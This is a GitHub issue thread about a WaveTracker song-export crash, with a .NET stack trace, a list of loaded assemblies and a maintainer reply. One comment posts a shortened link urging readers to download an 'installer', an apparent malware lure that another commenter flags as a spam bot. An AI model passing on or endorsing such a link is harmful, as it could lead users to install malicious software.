### ISSUE TITLE
[BUG] Error when exporting a song

### ISSUE THREAD

**Issue by juamnitruh** [squiggythings/WaveTracker#15]
**Describe the bug**
When i try to export this song, this error appears: 

![image](https://github.com/user-attachments/assets/cd4b4994-4a52-421e-a680-ec9d0ec839d3)

(Only this song does this. The sample songs export just fine)

What is written in the details: 

```

Consulte o final desta mensagem para obter detalhes sobre como chamar a 
depuração just-in-time (JIT) em vez desta caixa de diálogo.

************** Texto de Exceção **************
System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection. (Parameter 'index')
   at WaveTracker.Tracker.WTSong.GetNumberOfRows(Int32 loops)
   at WaveTracker.Audio.AudioEngine.RenderTo(String filepath, Int32 maxloops)
   at System.Threading.Tasks.Task.<>c.<ThrowAsync>b__128_0(Object state)
   at System.RuntimeMethodHandle.InvokeMethod(Object target, Void** arguments, Signature sig, Boolean isConstructor)
   at System.Reflection.MethodBaseInvoker.InvokeDirectByRefWithFewArgs(Object obj, Span`1 copyOfArgs, BindingFlags invokeAttr)


************** Assemblies Carregados **************
System.Private.CoreLib
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Private.CoreLib.dll
----------------------------------------
WaveTracker
    Versão do Assembly: 1.0.1.0
    Localização: C:\WaveTracker 1.0.0 (64-Bit)\WaveTracker.dll
----------------------------------------
System.Runtime
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Runtime.dll
----------------------------------------
MonoGame.Framework
    Versão do Assembly: 3.8.1.303
    Localização: C:\WaveTracker 1.0.0 (64-Bit)\MonoGame.Framework.dll
----------------------------------------
System.Windows.Forms
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.1\System.Windows.Forms.dll
----------------------------------------
System.ComponentModel.Primitives
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.ComponentModel.Primitives.dll
----------------------------------------
System.Windows.Forms.Primitives
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.1\System.Windows.Forms.Primitives.dll
----------------------------------------
System.Drawing.Primitives
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Drawing.Primitives.dll
----------------------------------------
System.Collections.Specialized
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Collections.Specialized.dll
----------------------------------------
System.Linq
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Linq.dll
----------------------------------------
System.Collections
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Collections.dll
----------------------------------------
System.ComponentModel
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.ComponentModel.dll
----------------------------------------
System.Threading
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Threading.dll
----------------------------------------
System.ComponentModel.TypeConverter
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.ComponentModel.TypeConverter.dll
----------------------------------------
System.Drawing.Common
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.1\System.Drawing.Common.dll
----------------------------------------
System.Diagnostics.TraceSource
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Diagnostics.TraceSource.dll
----------------------------------------
Microsoft.Win32.Primitives
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\Microsoft.Win32.Primitives.dll
----------------------------------------
System.Runtime.InteropServices
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Runtime.InteropServices.dll
----------------------------------------
System.ComponentModel.EventBasedAsync
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.ComponentModel.EventBasedAsync.dll
----------------------------------------
System.Threading.Thread
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Threading.Thread.dll
----------------------------------------
Accessibility
    Versão do Assembly: 4.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.1\Accessibility.dll
----------------------------------------
System.Memory
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Memory.dll
----------------------------------------
Microsoft.Win32.SystemEvents
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.1\Microsoft.Win32.SystemEvents.dll
----------------------------------------
SharpDX
    Versão do Assembly: 4.0.1.0
    Localização: C:\WaveTracker 1.0.0 (64-Bit)\SharpDX.dll
----------------------------------------
SharpDX.DXGI
    Versão do Assembly: 4.0.1.0
    Localização: C:\WaveTracker 1.0.0 (64-Bit)\SharpDX.DXGI.dll
----------------------------------------
System.Reflection
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Reflection.dll
----------------------------------------
SharpDX.Direct3D11
    Versão do Assembly: 4.0.1.0
    Localização: C:\WaveTracker 1.0.0 (64-Bit)\SharpDX.Direct3D11.dll
----------------------------------------
System.Text.Json
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Text.Json.dll
----------------------------------------
System.Text.Encoding.Extensions
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Text.Encoding.Extensions.dll
----------------------------------------
System.Text.Encodings.Web
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Text.Encodings.Web.dll
----------------------------------------
System.Runtime.Intrinsics
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Runtime.Intrinsics.dll
----------------------------------------
System.Numerics.Vectors
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Numerics.Vectors.dll
----------------------------------------
System.Private.Uri
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Private.Uri.dll
----------------------------------------
System.Collections.Concurrent
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Collections.Concurrent.dll
----------------------------------------
System.Reflection.Emit.Lightweight
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Reflection.Emit.Lightweight.dll
----------------------------------------
System.Reflection.Primitives
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Reflection.Primitives.dll
----------------------------------------
System.Reflection.Emit.ILGeneration
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Reflection.Emit.ILGeneration.dll
----------------------------------------
System.Runtime.Serialization.Primitives
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Runtime.Serialization.Primitives.dll
----------------------------------------
NAudio.Core
    Versão do Assembly: 2.1.0.0
    Localização: C:\WaveTracker 1.0.0 (64-Bit)\NAudio.Core.dll
----------------------------------------
netstandard
    Versão do Assembly: 2.1.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\netstandard.dll
----------------------------------------
NAudio.WinMM
    Versão do Assembly: 2.1.0.0
    Localização: C:\WaveTracker 1.0.0 (64-Bit)\NAudio.WinMM.dll
----------------------------------------
NAudio.Wasapi
    Versão do Assembly: 2.1.0.0
    Localização: C:\WaveTracker 1.0.0 (64-Bit)\NAudio.Wasapi.dll
----------------------------------------
System.Text.RegularExpressions
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Text.RegularExpressions.dll
----------------------------------------
mscorlib
    Versão do Assembly: 4.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\mscorlib.dll
----------------------------------------
protobuf-net
    Versão do Assembly: 3.0.0.0
    Localização: C:\WaveTracker 1.0.0 (64-Bit)\protobuf-net.dll
----------------------------------------
System.Xml.ReaderWriter
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Xml.ReaderWriter.dll
----------------------------------------
System.Private.Xml
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Private.Xml.dll
----------------------------------------
NAudio.Midi
    Versão do Assembly: 2.1.0.0
    Localização: C:\WaveTracker 1.0.0 (64-Bit)\NAudio.Midi.dll
----------------------------------------
System.Console
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Console.dll
----------------------------------------
System.Collections.NonGeneric
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Collections.NonGeneric.dll
----------------------------------------
System.Windows.Extensions
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.1\System.Windows.Extensions.dll
----------------------------------------
protobuf-net.Core
    Versão do Assembly: 3.0.0.0
    Localização: C:\WaveTracker 1.0.0 (64-Bit)\protobuf-net.Core.dll
----------------------------------------
System.Reflection.Emit
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Reflection.Emit.dll
----------------------------------------
Anonymously Hosted DynamicMethods Assembly
    Versão do Assembly: 0.0.0.0
    Localização: 
----------------------------------------
System.Collections.Immutable
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Collections.Immutable.dll
----------------------------------------
System.Runtime.Serialization.Formatters
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Runtime.Serialization.Formatters.dll
----------------------------------------
System.Threading.ThreadPool
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Threading.ThreadPool.dll
----------------------------------------
System.Runtime.Loader
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Runtime.Loader.dll
----------------------------------------
System.Windows.Forms.resources
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.1\pt-BR\System.Windows.Forms.resources.dll
----------------------------------------
System.Diagnostics.StackTrace
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Diagnostics.StackTrace.dll
----------------------------------------
System.Reflection.Metadata
    Versão do Assembly: 8.0.0.0
    Localização: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.1\System.Reflection.Metadata.dll
----------------------------------------

************** Depuração JIT **************
```

**To Reproduce**
1. Open my song
2. Click on Export
3. Click on begin

**Expected behavior**
It should have exported my module

**Desktop (please complete the following information):**
 - OS: Windows
 - Version:  11
 
Here's the song in question:

[beach.zip](https://github.com/user-attachments/files/16841888/beach.zip)

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by bryc** [comment]
previous comment is a spam bot, disregard.


The bug can be isolated down to the `H00` effect I think.

**Comment by squiggythings** [comment]
Thanks for letting me know. This will be fixed in an upcoming patch
